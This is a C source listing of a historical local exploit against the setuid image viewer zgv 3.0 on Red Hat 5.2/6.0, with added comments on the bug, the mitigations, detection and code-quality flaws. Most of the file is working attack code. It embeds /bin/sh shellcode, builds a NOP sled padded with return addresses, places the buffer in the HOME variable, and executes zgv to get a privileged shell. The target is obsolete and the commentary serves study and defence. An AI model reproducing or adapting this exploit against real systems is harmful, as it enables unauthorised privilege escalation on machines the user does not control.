/*
 * [gH] icesk brings jue [gH]
 * -> redhat 5.2 / redhat 6.0 zgv local (literally on console or a terminal)
 * -> zgv 3.0 exploit. affects zgv 3.0 even AFTER the vendor patch.
 *
 * Historical local exploit listing against a setuid zgv binary.  The
 * payload reaches zgv through the HOME environment variable (see the
 * setenv/execl pair at the end of main), so the bug being targeted is
 * presumably an unbounded copy of getenv("HOME") inside zgv -- that code
 * is not on this page; confirm against the zgv source.  Defensive notes:
 * on the zgv side the fix is a bounded copy (snprintf) and treating the
 * environment as untrusted input; a non-executable stack, ASLR and stack
 * canaries each defeat this technique.  For detection, a setuid zgv being
 * exec'd with an oversized, mostly non-printable HOME is the observable.
 *
 * Code-quality notes (code left as written; this is a historical listing):
 *  - The header names after the three #include directives were lost in
 *    extraction (angle brackets stripped).  The code uses printf, malloc,
 *    strlen, setenv, execl and u_long, so stdio.h, stdlib.h, string.h,
 *    unistd.h and sys/types.h are the likely set -- verify.
 *  - Several constructs are GCC-specific or non-standard C: casts applied
 *    to lvalues, `void main`, and a non-void function with no return.
 */
#include
#include
#include

#define nop 0x90

/* not my shellcode */
/* Opaque machine-code payload; the only readable part is the trailing
 * "/bin/sh" literal.  Kept byte-identical, not decoded here. */
char shellcode[] =
"\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
"\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
"\xeb\x05\xe8\xdb\xff\xff\xff"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer.
 * There is no return statement: the function relies on the asm leaving
 * %esp in %eax and on %eax being the i386 integer return register.  That
 * is compiler- and ABI-specific and undefined behaviour in standard C. */
u_long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

/* Builds the payload in a heap buffer and exec's zgv with it in HOME.
 * `void main` is non-standard; argc and argv are never read, and offset
 * is never changed from 0, so address is simply get_sp(). */
void main(int argc, char **argv)
{
    char *buffer, *ptr;
    long *address_ptr, *address;
    int i, desc, offset = 0, bsize = 1024;

    /* malloc result is not checked for NULL; desc is declared but unused. */
    buffer = malloc(bsize);

    /* Cast applied to an lvalue -- a GCC extension, not valid standard C.
     * With offset == 0 this is address = (long *)get_sp(). */
    (char *)address = get_sp() - offset;
    /* %#x expects unsigned int but is given a pointer: format/argument
     * type mismatch (UB in standard C; happens to work on ILP32). */
    printf("return address %#x\n" ,address);

    /* Fill the whole buffer with copies of `address`, one long every
     * 4 bytes.  This only covers exactly bsize bytes when sizeof(long)
     * == 4; with an 8-byte long the loop writes past the end of buffer.
     * Another lvalue cast. */
    ptr = buffer;
    address_ptr = (long *)ptr;
    for(i=0;i < bsize;i += 4)
        (int *)*(address_ptr++) = address;

    /* Overwrite the first half of the buffer with the 0x90 byte. */
    for(i=0;i < bsize / 2; i++)
        buffer[i] = nop;

    /* Copy shellcode so it sits centred in the buffer.  strlen(shellcode)
     * is re-evaluated on every iteration of the loop condition. */
    ptr = buffer + ((bsize / 2) - (strlen(shellcode) / 2));
    for(i=0;i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    /* NUL-terminate so the buffer is a valid C string for setenv. */
    buffer[bsize - 1] = '\0';

    printf("g0t w00t sh3ll!\n");

    /* The payload is passed to zgv via HOME; zgv's handling of that
     * variable is the vulnerable code, not shown here.  The argv
     * terminator should be (char *)NULL rather than 0: in a variadic call
     * a bare 0 is an int, which is only pointer-sized by accident on i386. */
    setenv("HOME", buffer, 1);
    execl("/usr/bin/zgv", "zgv", 0);
}